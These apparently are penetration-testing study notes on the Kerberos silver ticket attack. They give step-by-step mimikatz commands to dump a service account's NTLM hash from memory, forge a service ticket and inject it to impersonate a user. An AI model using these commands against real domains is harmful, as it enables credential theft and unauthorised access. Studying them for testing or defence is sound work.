- Overpass-the-hash gets us a Kerberos TGT, allowing us to authenticate using Kerberos. We can only use that TGT on the machine it was created for, but a forged TGS (a silver ticket) potentially offers more flexibility: we encrypt it ourselves with the service account's password hash, so the KDC is never contacted and the service accepts it as long as the hash is correct
- whoami /user
  gives the current user's SID, e.g. S-1-5-21-1602875587-2787523311-2599479668-1103
- The domain SID is the entire string except the RID at the end (-1103), i.e. S-1-5-21-1602875587-2787523311-2599479668
- Extract the NTLM hash of the service account (the account the target service runs as; if the SPN is registered on the computer object, that is the machine account)
- mimikatz.exe
- privilege::debug
- sekurlsa::logonpasswords (dumps the service account's NTLM hash if that account has a logon session on this host)
- kerberos::purge to delete existing tickets, so a cached real ticket cannot mask the result
- kerberos::list to verify the cache is empty
- kerberos::golden /user:<user to impersonate> /domain:<domain> /sid:<domain SID from above> /target:<fully qualified host name of the service> /service:<SPN service class, e.g. cifs or http> /rc4:<NTLM hash of the service account> /ptt
- misc::cmd to launch a cmd with the injected ticket; klist shows the forged TGS and accessing the service verifies success
Reference:
Silver Ticket Attack